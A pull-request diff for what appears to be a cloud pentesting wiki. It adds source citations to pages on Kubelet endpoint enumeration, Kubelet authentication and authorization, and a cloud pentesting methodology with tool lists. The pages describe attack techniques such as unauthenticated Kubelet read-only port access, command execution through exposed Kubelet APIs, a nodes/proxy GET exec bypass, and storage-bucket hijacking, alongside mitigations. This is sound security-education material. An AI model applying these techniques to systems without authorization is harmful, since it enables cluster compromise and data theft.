+The **Kubelet** service **API is not documented**, but the source code can be found here and finding the exposed endpoints is as easy as **running**:<sup>[[6]](#references)</sup>
 
 ```bash
 curl -s https://raw.githubusercontent.com/kubernetes/kubernetes/master/pkg/kubelet/server/server.go | grep 'Path("/'
@@ -219,7 +219,7 @@ Path("/runningpods/").
 
 All of them sound interesting.
 
-You can use the [**Kubeletctl**](https://github.com/cyberark/kubeletctl) tool to interact with Kubelets and their endpoints.
+You can use the [**Kubeletctl**](https://github.com/cyberark/kubeletctl) tool to interact with Kubelets and their endpoints.<sup>[[13]](#references)</sup>
 
 #### /pods
 
@@ -238,24 +238,39 @@ kubeletctl exec [command]
 ```
 
 > [!NOTE]
-> To avoid this attack the _**kubelet**_ service should be run with `--anonymous-auth false` and the service should be segregated at the network level.
+> To avoid this attack the _**kubelet**_ service should be run with `--anonymous-auth false` and the service should be segregated at the network level.<sup>[[4]](#references)[[18]](#references)</sup>
 
 ### **Checking Kubelet (Read Only Port) Information Exposure**
 
-When a **kubelet read-only port** is exposed, it becomes possible for information to be retrieved from the API by unauthorized parties. The exposure of this port may lead to the disclosure of various **cluster configuration elements**. Although the information, including **pod names, locations of internal files, and other configurations**, may not be critical, its exposure still poses a security risk and should be avoided.
+When a **kubelet read-only port** is exposed, it becomes possible for information to be retrieved from the API by unauthorized parties. The exposure of this port may lead to the disclosure of various **cluster configuration elements**. Although the information, including **pod names, locations of internal files, and other configurations**, may not be critical, its exposure still poses a security risk and should be avoided.<sup>[[1]](#references)[[3]](#references)[[5]](#references)</sup>
 
-An example of how this vulnerability can be exploited involves a remote attacker accessing a specific URL. By navigating to `http://<external-IP>:10255/pods`, the attacker can potentially retrieve sensitive information from the kubelet:
+An example of how this vulnerability can be exploited involves a remote attacker accessing a specific URL. By navigating to `http://<external-IP>:10255/pods`, the attacker can potentially retrieve sensitive information from the kubelet:<sup>[[1]](#references)[[5]](#references)</sup>
 
-![Kubelet read-only port response exposing pod information](https://www.cyberark.com/wp-content/uploads/2019/09/KUbe-Pen-2-fig-6.png)
+![Kubelet read-only port response exposing pod information](https://www.cyberark.com/wp-content/uploads/2019/09/KUbe-Pen-2-fig-6.png)<sup>[[1]](#references)</sup>
 
 ## References
 
-{{#ref}}
-https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-2
-{{#endref}}
-
-{{#ref}}
-https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet
-{{#endref}}
+- [1] [Kubernetes Pentest Methodology Part 2](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-2)
+- [2] [Attacking Kubernetes through Kubelet](https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet)
+- [3] [Kubernetes API Server Bypass Risks](https://kubernetes.io/docs/concepts/security/api-server-bypass-risks/)
+- [4] [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/)
+- [5] [kubelet](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/)
+- [6] [Kubelet server source](https://raw.githubusercontent.com/kubernetes/kubernetes/master/pkg/kubelet/server/server.go)
+- [7] [Service](https://kubernetes.io/docs/concepts/services-networking/service/#type-nodeport)
+- [8] [Authenticating](https://kubernetes.io/docs/reference/access-authn-authz/authentication/)
+- [9] [Kubernetes API health endpoints](https://kubernetes.io/docs/reference/using-api/health-checks/)
+- [10] [Using RBAC Authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
+- [11] [How to get keys by prefix](https://etcd.io/docs/v3.5/tutorials/how-to-get-key-by-prefix/)
+- [12] [etcdctl READMEv2](https://github.com/etcd-io/etcd/blob/master/etcdctl/READMEv2.md)
+- [13] [kubeletctl](https://github.com/cyberark/kubeletctl)
+- [14] [The Istio service mesh](https://istio.io/latest/about/service-mesh/)
+- [15] [What is a service mesh?](https://linkerd.io/what-is-a-service-mesh/)
+- [16] [Service Mesh](https://docs.cilium.io/en/stable/network/servicemesh/)
+- [17] [Administration interface](https://www.envoyproxy.io/docs/envoy/latest/operations/admin)
+- [18] [Network Policies](https://kubernetes.io/docs/concepts/services-networking/network-policies/)
+- [19] [PeerAuthentication](https://istio.io/latest/docs/reference/config/security/peer_authentication/)
+- [20] [Cluster API server endpoint - Amazon EKS](https://docs.aws.amazon.com/eks/latest/userguide/cluster-endpoint.html)
+- [21] [About network isolation in GKE](https://docs.cloud.google.com/kubernetes-engine/docs/concepts/network-isolation)
+- [22] [Create a Private Azure Kubernetes Service (AKS) Cluster](https://learn.microsoft.com/en-us/azure/aks/private-clusters)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md
+++ b/src/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md
@@ -6,11 +6,11 @@
 
 [**From the docss:**](https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/)
 
-By default, requests to the kubelet's HTTPS endpoint that are not rejected by other configured authentication methods are treated as anonymous requests, and given a **username of `system:anonymous`** and a **group of `system:unauthenticated`**.
+By default, requests to the kubelet's HTTPS endpoint that are not rejected by other configured authentication methods are treated as anonymous requests, and given a **username of `system:anonymous`** and a **group of `system:unauthenticated`**.<sup>[[1]](#references)</sup>
 
-The **3** authentication **methods** are:
+The **3** authentication **methods** are:<sup>[[1]](#references)</sup>
 
-- **Anonymous** (default): Use set setting the param **`--anonymous-auth=true` or the config:**
+- **Anonymous** (default): Use set setting the param **`--anonymous-auth=true` or the config:**<sup>[[1]](#references)[[4]](#references)</sup>
 
 ```json
 "authentication": {
@@ -19,9 +19,9 @@ The **3** authentication **methods** are:
     },
 ```
 
-- **Webhook**: This will **enable** the kubectl **API bearer tokens** as authorization (any valid token will be valid). Allow it with:
-  - ensure the `authentication.k8s.io/v1beta1` API group is enabled in the API server
-  - start the kubelet with the **`--authentication-token-webhook`** and **`--kubeconfig`** flags or use the following setting:
+- **Webhook**: This will **enable** the kubectl **API bearer tokens** as authorization (any valid token will be valid). Allow it with:<sup>[[1]](#references)[[4]](#references)[[7]](#references)</sup>
+  - ensure the `authentication.k8s.io/v1beta1` API group is enabled in the API server<sup>[[7]](#references)</sup>
+  - start the kubelet with the **`--authentication-token-webhook`** and **`--kubeconfig`** flags or use the following setting:<sup>[[1]](#references)[[4]](#references)[[7]](#references)</sup>
 
 ```json
 "authentication": {
@@ -32,11 +32,11 @@ The **3** authentication **methods** are:
 ```
 
 > [!NOTE]
-> The kubelet calls the **`TokenReview` API** on the configured API server to **determine user information** from bearer tokens
+> The kubelet calls the **`TokenReview` API** on the configured API server to **determine user information** from bearer tokens<sup>[[1]](#references)</sup>
 
-- **X509 client certificates:** Allow to authenticate via X509 client certs
-  - see the [apiserver authentication documentation](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#x509-client-certs) for more details
-  - start the kubelet with the `--client-ca-file` flag, providing a CA bundle to verify client certificates with. Or with the config:
+- **X509 client certificates:** Allow to authenticate via X509 client certs<sup>[[1]](#references)[[5]](#references)</sup>
+  - see the [apiserver authentication documentation](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#x509-client-certs) for more details<sup>[[5]](#references)</sup>
+  - start the kubelet with the `--client-ca-file` flag, providing a CA bundle to verify client certificates with. Or with the config:<sup>[[1]](#references)[[4]](#references)</sup>
 
 ```json
 "authentication": {
@@ -48,14 +48,14 @@ The **3** authentication **methods** are:
 
 ## Kubelet Authorization <a href="#kubelet-authentication" id="kubelet-authentication"></a>
 
-Any request that is successfully authenticated (including an anonymous request) **is then authorized**. The **default** authorization mode is **`AlwaysAllow`**, which **allows all requests**.
+Any request that is successfully authenticated (including an anonymous request) **is then authorized**. The **default** authorization mode is **`AlwaysAllow`**, which **allows all requests**.<sup>[[1]](#references)</sup>
 
-However, the other possible value is **`webhook`** (which is what you will be **mostly finding out there**). This mode will **check the permissions of the authenticated user** to allow or disallow an action.
+However, the other possible value is **`webhook`** (which is what you will be **mostly finding out there**). This mode will **check the permissions of the authenticated user** to allow or disallow an action.<sup>[[1]](#references)</sup>
 
 > [!WARNING]
-> Note that even if the **anonymous authentication is enabled** the **anonymous access** might **not have any permissions** to perform any action.
+> Note that even if the **anonymous authentication is enabled** the **anonymous access** might **not have any permissions** to perform any action.<sup>[[1]](#references)</sup>
 
-The authorization via webhook can be configured using the **param `--authorization-mode=Webhook`** or via the config file with:
+The authorization via webhook can be configured using the **param `--authorization-mode=Webhook`** or via the config file with:<sup>[[1]](#references)[[4]](#references)</sup>
 
 ```json
 "authorization": {
@@ -67,11 +67,11 @@ The authorization via webhook can be configured using the **param `--authorizati
 },
 ```
 
-The kubelet calls the **`SubjectAccessReview`** API on the configured API server to **determine** whether each request is **authorized.**
+The kubelet calls the **`SubjectAccessReview`** API on the configured API server to **determine** whether each request is **authorized.**<sup>[[1]](#references)</sup>
 
-The kubelet authorizes API requests using the same [request attributes](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#review-your-request-attributes) approach as the apiserver:
+The kubelet authorizes API requests using the same [request attributes](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#review-your-request-attributes) approach as the apiserver:<sup>[[1]](#references)[[6]](#references)</sup>
 
-- **Action**
+- **Action**<sup>[[6]](#references)</sup>
 
 | HTTP verb | request verb                                                                                                                                                  |
 | --------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------- |
@@ -81,7 +81,7 @@ The kubelet authorizes API requests using the same [request attributes](https://
 | PATCH     | patch                                                                                                                                                         |
 | DELETE    | delete (for individual resources), deletecollection (for collections)                                                                                         |
 
-- The **resource** talking to the Kubelet api is **always** **nodes** and **subresource** is **determined** from the incoming request's path:
+- The **resource** talking to the Kubelet api is **always** **nodes** and **subresource** is **determined** from the incoming request's path:<sup>[[1]](#references)</sup>
 
 | Kubelet API  | resource | subresource |
 | ------------ | -------- | ----------- |
@@ -92,7 +92,7 @@ The kubelet authorizes API requests using the same [request attributes](https://
 | /checkpoint/\* | nodes  | checkpoint  |
 | _all others_ | nodes    | proxy       |
 
-In modern clusters, fine-grained kubelet authorization is enabled by default. Kubernetes v1.36 made this stable: kubelet first checks more specific subresources for paths such as `/pods`, `/runningPods`, `/healthz`, and `/configz` before falling back to `nodes/proxy` for backward compatibility.
+In modern clusters, fine-grained kubelet authorization is enabled by default. Kubernetes v1.36 made this stable: kubelet first checks more specific subresources for paths such as `/pods`, `/runningPods`, `/healthz`, and `/configz` before falling back to `nodes/proxy` for backward compatibility.<sup>[[1]](#references)</sup>
 
 | Kubelet API | preferred subresource | fallback |
 | ----------- | --------------------- | -------- |
@@ -101,12 +101,12 @@ In modern clusters, fine-grained kubelet authorization is enabled by default. Ku
 | /healthz    | nodes/healthz         | nodes/proxy |
 | /configz    | nodes/configz         | nodes/proxy |
 
-Use these narrower subresources for monitoring and diagnostics when possible. Avoid granting broad `nodes/proxy` for ordinary metrics, stats, health, pod-listing, or config review because `nodes/proxy` still covers higher-impact kubelet APIs.
+Use these narrower subresources for monitoring and diagnostics when possible. Avoid granting broad `nodes/proxy` for ordinary metrics, stats, health, pod-listing, or config review because `nodes/proxy` still covers higher-impact kubelet APIs.<sup>[[1]](#references)</sup>
 
 > [!NOTE]
-> WebSocket-based `/exec`, `/run`, `/attach`, and `/portforward` fall into the default **proxy** subresource and are authorized using the initial HTTP **GET** handshake. A principal with only `nodes/proxy` **GET** can still exec containers if it connects directly to `https://<node_ip>:10250` over WebSockets. See the [nodes/proxy GET -> Kubelet /exec verb confusion abuse](../abusing-roles-clusterroles-in-kubernetes/README.md#nodesproxy-get---kubelet-exec-via-websocket-verb-confusion) for details.
+> WebSocket-based `/exec`, `/run`, `/attach`, and `/portforward` fall into the default **proxy** subresource and are authorized using the initial HTTP **GET** handshake. A principal with only `nodes/proxy` **GET** can still exec containers if it connects directly to `https://<node_ip>:10250` over WebSockets. See the [nodes/proxy GET -> Kubelet /exec verb confusion abuse](../abusing-roles-clusterroles-in-kubernetes/README.md#nodesproxy-get---kubelet-exec-via-websocket-verb-confusion) for details.<sup>[[1]](#references)[[3]](#references)</sup>
 
-The kubelet Checkpoint API (`POST /checkpoint/<namespace>/<pod>/<container>`) is another sensitive kubelet surface. Kubernetes v1.30 made container checkpointing beta and enabled by default, but a request still depends on kubelet authorization and runtime support such as CRI-O or containerd with checkpoint/CRIU capability. Successful checkpoints are written below the kubelet root directory, by default `/var/lib/kubelet/checkpoints`, and can contain process memory with tokens, keys, or application secrets. Restrict `nodes/checkpoint`, disable the old read-only port, limit direct kubelet network reachability, and monitor or clean checkpoint archives if the feature is intentionally used.
+The kubelet Checkpoint API (`POST /checkpoint/<namespace>/<pod>/<container>`) is another sensitive kubelet surface. Kubernetes v1.30 made container checkpointing beta and enabled by default, but a request still depends on kubelet authorization and runtime support such as CRI-O or containerd with checkpoint/CRIU capability. Successful checkpoints are written below the kubelet root directory, by default `/var/lib/kubelet/checkpoints`, and can contain process memory with tokens, keys, or application secrets. Restrict `nodes/checkpoint`, disable the old read-only port, limit direct kubelet network reachability, and monitor or clean checkpoint archives if the feature is intentionally used.<sup>[[1]](#references)[[2]](#references)[[4]](#references)[[8]](#references)</sup>
 
 For example, the following request tried to access the pods info of kubelet without permission:
 
@@ -115,16 +115,19 @@ curl -k --header "Authorization: Bearer ${TOKEN}" 'https://172.31.28.172:10250/p
 Forbidden (user=system:node:ip-172-31-28-172.ec2.internal, verb=get, resource=nodes, subresource=proxy)
 ```
 
-- We got a **Forbidden**, so the request **passed the Authentication check**. If not, we would have got just an `Unauthorised` message.
-- We can see the **username** (in this case from the token)
-- Check how the **resource** was **nodes** and the **subresource** **proxy** (which makes sense with the previous information)
+- We got a **Forbidden**, so the request **passed the Authentication check**. If not, we would have got just an `Unauthorised` message.<sup>[[1]](#references)</sup>
+- We can see the **username** (in this case from the token)<sup>[[1]](#references)</sup>
+- Check how the **resource** was **nodes** and the **subresource** **proxy** (which makes sense with the previous information)<sup>[[1]](#references)</sup>
 
 ## References
 
-- [https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/](https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/)
-- [https://kubernetes.io/docs/reference/node/kubelet-checkpoint-api/](https://kubernetes.io/docs/reference/node/kubelet-checkpoint-api/)
-- [nodes/proxy GET -> kubelet exec via WebSocket bypass](https://grahamhelton.com/blog/nodes-proxy-rce)
+- [1] [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/)
+- [2] [Kubelet Checkpoint API](https://kubernetes.io/docs/reference/node/kubelet-checkpoint-api/)
+- [3] [Kubernetes Remote Code Execution Via Nodes/Proxy GET Permission](https://grahamhelton.com/blog/nodes-proxy-rce)
+- [4] [Kubelet Configuration (v1beta1)](https://kubernetes.io/docs/reference/config-api/kubelet-config.v1beta1/)
+- [5] [X.509 client certificates](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#x509-client-certs)
+- [6] [Request attributes used in authorization](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#review-your-request-attributes)
+- [7] [Kubelet authentication/authorization (v1.34)](https://v1-34.docs.kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/)
+- [8] [Security Advisory CVE-2025-0426: Node Denial of Service via kubelet Checkpoint API](https://discuss.kubernetes.io/t/security-advisory-cve-2025-0426-node-denial-of-service-via-kubelet-checkpoint-api/31587)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-

--- a/src/pentesting-cloud/pentesting-cloud-methodology.md
+++ b/src/pentesting-cloud/pentesting-cloud-methodology.md
@@ -34,7 +34,7 @@ Each cloud has its own peculiarities but in general there are a few **common thi
 
 ### Hunt autonomous data streams writing to globally-unique storage
 
-During post-exploitation, review long-lived exports such as log sinks, subscriptions, replication jobs, Firehose streams, and diagnostic settings that write to buckets or storage accounts by globally-unique name. If the destination can be deleted and the same name can be recreated under attacker control, the upstream service might keep delivering sensitive data to the replacement destination even when the attacker cannot update the router resource itself.
+During post-exploitation, review long-lived exports such as log sinks, subscriptions, replication jobs, Firehose streams, and diagnostic settings that write to buckets or storage accounts by globally-unique name. If the destination can be deleted and the same name can be recreated under attacker control, the upstream service might keep delivering sensitive data to the replacement destination even when the attacker cannot update the router resource itself.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)</sup>
 
 Focus this check in the relevant service pages:
 
@@ -64,7 +64,7 @@ There are several tools that can be used to test different cloud environments. T
 
 ### [PurplePanda](https://github.com/carlospolop/purplepanda)
 
-A tool to **identify bad configurations and privesc path in clouds and across clouds/SaaS.**
+A tool to **identify bad configurations and privesc path in clouds and across clouds/SaaS.**<sup>[[5]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="Install" }}
@@ -101,7 +101,7 @@ python3 main.py -e -p google #Enumerate the env
 
 ### [Prowler](https://github.com/prowler-cloud/prowler)
 
-It supports **AWS, GCP & Azure**. Check how to configure each provider in [https://docs.prowler.cloud/en/latest/#aws](https://docs.prowler.cloud/en/latest/#aws)
+It supports **AWS, GCP & Azure**. Check how to configure each provider in [https://docs.prowler.cloud/en/latest/#aws](https://docs.prowler.cloud/en/latest/#aws)<sup>[[6]](#references)[[7]](#references)</sup>
 
 ```bash
 # Install
@@ -120,7 +120,7 @@ prowler <provider> --list-services
 
 ### [CloudSploit](https://github.com/aquasecurity/cloudsploit)
 
-AWS, Azure, Github, Google, Oracle, Alibaba
+AWS, Azure, Github, Google, Oracle, Alibaba<sup>[[8]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="Install" }}
@@ -148,7 +148,7 @@ npm install
 
 ### [ScoutSuite](https://github.com/nccgroup/ScoutSuite)
 
-AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure
+AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure<sup>[[9]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="Install" }}
@@ -186,7 +186,7 @@ done
 
 {{#tabs }}
 {{#tab name="Install" }}
-Download and install Steampipe ([https://steampipe.io/downloads](https://steampipe.io/downloads)). Or use Brew:
+Download and install Steampipe ([https://steampipe.io/downloads](https://steampipe.io/downloads)). Or use Brew:<sup>[[10]](#references)</sup>
 
 ```
 brew tap turbot/tap
@@ -214,7 +214,7 @@ steampipe check all
 
 <summary>Check all Projects</summary>
 
-In order to check all the projects you need to generate the `gcp.spc` file indicating all the projects to test. You can just follow the indications from the following script
+In order to check all the projects you need to generate the `gcp.spc` file indicating all the projects to test. You can just follow the indications from the following script.<sup>[[11]](#references)[[12]](#references)</sup>
 
 ```bash
 FILEPATH="/tmp/gcp.spc"
@@ -240,14 +240,16 @@ echo "Copy $FILEPATH in ~/.steampipe/config/gcp.spc if it was correctly generate
 
 </details>
 
-To check **other GCP insights** (useful for enumerating services) use: [https://github.com/turbot/steampipe-mod-gcp-insights](https://github.com/turbot/steampipe-mod-gcp-insights)
+To check **other GCP insights** (useful for enumerating services) use: [https://github.com/turbot/steampipe-mod-gcp-insights](https://github.com/turbot/steampipe-mod-gcp-insights)<sup>[[12]](#references)</sup>
 
-To check Terraform GCP code: [https://github.com/turbot/steampipe-mod-terraform-gcp-compliance](https://github.com/turbot/steampipe-mod-terraform-gcp-compliance)
+To check Terraform GCP code: [https://github.com/turbot/steampipe-mod-terraform-gcp-compliance](https://github.com/turbot/steampipe-mod-terraform-gcp-compliance)<sup>[[13]](#references)</sup>
 
-More GCP plugins of Steampipe: [https://github.com/turbot?q=gcp](https://github.com/turbot?q=gcp)
+More GCP plugins of Steampipe: [https://github.com/turbot?q=gcp](https://github.com/turbot?q=gcp)<sup>[[18]](#references)</sup>
 {{#endtab }}
 
 {{#tab name="AWS" }}
+
+These modules cover account insights, internet-exposed resources, and compliance benchmarks.<sup>[[14]](#references)[[15]](#references)[[16]](#references)</sup>
 
 ```bash
 # Install aws plugin
@@ -273,24 +275,24 @@ steampipe dashboard # To see results in browser
 steampipe check all --export=/tmp/output4.json
 ```
 
-To check Terraform AWS code: [https://github.com/turbot/steampipe-mod-terraform-aws-compliance](https://github.com/turbot/steampipe-mod-terraform-aws-compliance)
+To check Terraform AWS code: [https://github.com/turbot/steampipe-mod-terraform-aws-compliance](https://github.com/turbot/steampipe-mod-terraform-aws-compliance)<sup>[[17]](#references)</sup>
 
-More AWS plugins of Steampipe: [https://github.com/orgs/turbot/repositories?q=aws](https://github.com/orgs/turbot/repositories?q=aws)
+More AWS plugins of Steampipe: [https://github.com/orgs/turbot/repositories?q=aws](https://github.com/orgs/turbot/repositories?q=aws)<sup>[[19]](#references)</sup>
 {{#endtab }}
 {{#endtabs }}
 
 ### [~~cs-suite~~](https://github.com/SecurityFTW/cs-suite)
 
-AWS, GCP, Azure, DigitalOcean.\
-It requires python2.7 and looks unmaintained.
+AWS, GCP, Azure, DigitalOcean.<sup>[[20]](#references)</sup>\
+It requires python2.7 and looks unmaintained.<sup>[[20]](#references)</sup>
 
 ### Nessus
 
-Nessus has an _**Audit Cloud Infrastructure**_ scan supporting: AWS, Azure, Office 365, Rackspace, Salesforce. Some extra configurations in **Azure** are needed to obtain a **Client Id**.
+Nessus has an _**Audit Cloud Infrastructure**_ scan for third-party cloud-service configuration. The original page listed AWS, Azure, Office 365, Rackspace, and Salesforce; Tenable's current template documentation lists AWS, GCP, Azure, Rackspace, Salesforce.com, and Zoom, so verify the provider matrix for the installed Nessus version.<sup>[[21]](#references)</sup> Some extra configurations in **Azure** are needed to obtain a **Client Id**.<sup>[[22]](#references)</sup>
 
 ### [**cloudlist**](https://github.com/projectdiscovery/cloudlist)
 
-Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers.
+Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers.<sup>[[23]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="Cloudlist" }}
@@ -317,7 +319,7 @@ cloudlist -config </path/to/config>
 
 ### [**cartography**](https://github.com/lyft/cartography)
 
-Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.
+Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.<sup>[[24]](#references)[[25]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="Install" }}
@@ -358,7 +360,7 @@ docker run --platform linux/amd64 \
 
 ### [**starbase**](https://github.com/JupiterOne/starbase)
 
-Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database.
+Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database.<sup>[[26]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="Install" }}
@@ -421,7 +423,7 @@ storage:
 
 ### [**SkyArk**](https://github.com/cyberark/SkyArk)
 
-Discover the most privileged users in the scanned AWS or Azure environment, including the AWS Shadow Admins. It uses powershell.
+Discover the most privileged users in the scanned AWS or Azure environment, including the AWS Shadow Admins. It uses powershell.<sup>[[27]](#references)</sup>
 
 ```bash
 Import-Module .\SkyArk.ps1 -force
@@ -434,17 +436,17 @@ Scan-AzureAdmins
 
 ### [Cloud Brute](https://github.com/0xsha/CloudBrute)
 
-A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).
+A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).<sup>[[28]](#references)</sup>
 
 ### [CloudFox](https://github.com/BishopFox/cloudfox)
 
-- CloudFox is a tool to find exploitable attack paths in cloud infrastructure (currently only AWS & Azure supported with GCP upcoming).
-- It is an enumeration tool which is intended to compliment manual pentesting.
-- It doesn't create or modify any data within the cloud environment.
+- CloudFox is a tool to find exploitable attack paths in cloud infrastructure (currently only AWS & Azure supported with GCP upcoming).<sup>[[29]](#references)</sup>
+- It is an enumeration tool which is intended to compliment manual pentesting.<sup>[[29]](#references)</sup>
+- It doesn't create or modify any data within the cloud environment.<sup>[[29]](#references)</sup>
 
 ### More lists of cloud security tools
 
-- [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec)
+- [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec)<sup>[[30]](#references)</sup>
 
 ## Google
 
@@ -482,11 +484,35 @@ confidential-computing/luks2-header-malleability-null-cipher-abuse.md
 
 ## References
 
-- [The Global Namespace Risk: Universal Bucket Hijacking Technique for Cloud Data Exfiltration](https://unit42.paloaltonetworks.com/cloud-bucket-hijacking-risks/)
-- [Cloud Logging routing and sinks](https://docs.cloud.google.com/logging/docs/export/configure_export_v2)
-- [Amazon S3 replication](https://docs.aws.amazon.com/AmazonS3/latest/userguide/replication.html)
-- [Azure Monitor diagnostic settings](https://learn.microsoft.com/en-us/azure/azure-monitor/platform/diagnostic-settings)
+- [1] [The Global Namespace Risk: Universal Bucket Hijacking Technique for Cloud Data Exfiltration](https://unit42.paloaltonetworks.com/cloud-bucket-hijacking-risks/)
+- [2] [Cloud Logging routing and sinks](https://docs.cloud.google.com/logging/docs/export/configure_export_v2)
+- [3] [Amazon S3 replication](https://docs.aws.amazon.com/AmazonS3/latest/userguide/replication.html)
+- [4] [Azure Monitor diagnostic settings](https://learn.microsoft.com/en-us/azure/azure-monitor/platform/diagnostic-settings)
+- [5] [PurplePanda repository](https://github.com/carlospolop/purplepanda)
+- [6] [Prowler repository](https://github.com/prowler-cloud/prowler)
+- [7] [Prowler documentation](https://docs.prowler.com/introduction)
+- [8] [CloudSploit repository](https://github.com/aquasecurity/cloudsploit)
+- [9] [ScoutSuite repository](https://github.com/nccgroup/ScoutSuite)
+- [10] [Steampipe downloads](https://steampipe.io/downloads)
+- [11] [GCP Compliance Mod for Powerpipe](https://github.com/turbot/steampipe-mod-gcp-compliance)
+- [12] [GCP Insights Mod for Powerpipe](https://github.com/turbot/steampipe-mod-gcp-insights)
+- [13] [Terraform GCP Compliance Mod for Powerpipe](https://github.com/turbot/steampipe-mod-terraform-gcp-compliance)
+- [14] [AWS Insights Mod for Powerpipe](https://github.com/turbot/steampipe-mod-aws-insights)
+- [15] [AWS Perimeter Mod for Powerpipe](https://github.com/turbot/steampipe-mod-aws-perimeter)
+- [16] [AWS Compliance Mod for Powerpipe](https://github.com/turbot/steampipe-mod-aws-compliance)
+- [17] [Terraform AWS Compliance Mod for Powerpipe](https://github.com/turbot/steampipe-mod-terraform-aws-compliance)
+- [18] [Turbot GCP repositories](https://github.com/turbot?q=gcp)
+- [19] [Turbot AWS repositories](https://github.com/orgs/turbot/repositories?q=aws)
+- [20] [Cloud Security Suite repository](https://github.com/SecurityFTW/cs-suite)
+- [21] [Scan Templates (Tenable Nessus)](https://docs.tenable.com/nessus/Content/ScanAndPolicyTemplates.htm)
+- [22] [Configure Azure for a Compliance Audit](https://docs.tenable.com/integrations/Microsoft/Azure/Content/ConfigureAzureComplianceAudit.htm)
+- [23] [Cloudlist repository](https://github.com/projectdiscovery/cloudlist)
+- [24] [Cartography repository](https://github.com/lyft/cartography)
+- [25] [Cartography documentation](https://docs.cartography.dev/)
+- [26] [Starbase repository](https://github.com/JupiterOne/starbase)
+- [27] [SkyArk repository](https://github.com/cyberark/SkyArk)
+- [28] [CloudBrute repository](https://github.com/0xsha/CloudBrute)
+- [29] [CloudFox v1.8.1 README](https://github.com/BishopFox/cloudfox/blob/v1.8.1/README.md)
+- [30] [awesome-cloud-sec repository](https://github.com/RyanJarv/awesome-cloud-sec)
 
 {{#include ../banners/hacktricks-training.md}}
-
-


### PR DESCRIPTION
## Summary

Migrates the exact SUMMARY pages 51-100 to source-grounded citations. The batch contains 47 substantive page edits and 3 validated no-op pages (79, 82, and 100); no page is included outside this range.

## Validation

- All 591 unique SUMMARY paths were inventoried in exact order and batch scope was checked.
- Each page passed reference numbering/URL uniqueness, adjacent linked superscript syntax, citation placement, code-block and original-link preservation, include-count/path, and final training-footer checks.
- `git diff --check` passed.
- Literal `hackingthe.cloud`/ `hackingthecloud` scans of src, the batch diff, and git history were empty; workers reported no prohibited provenance.
- mdBook build was not repeated because this machine lacks the required mdbook-tabs preprocessor.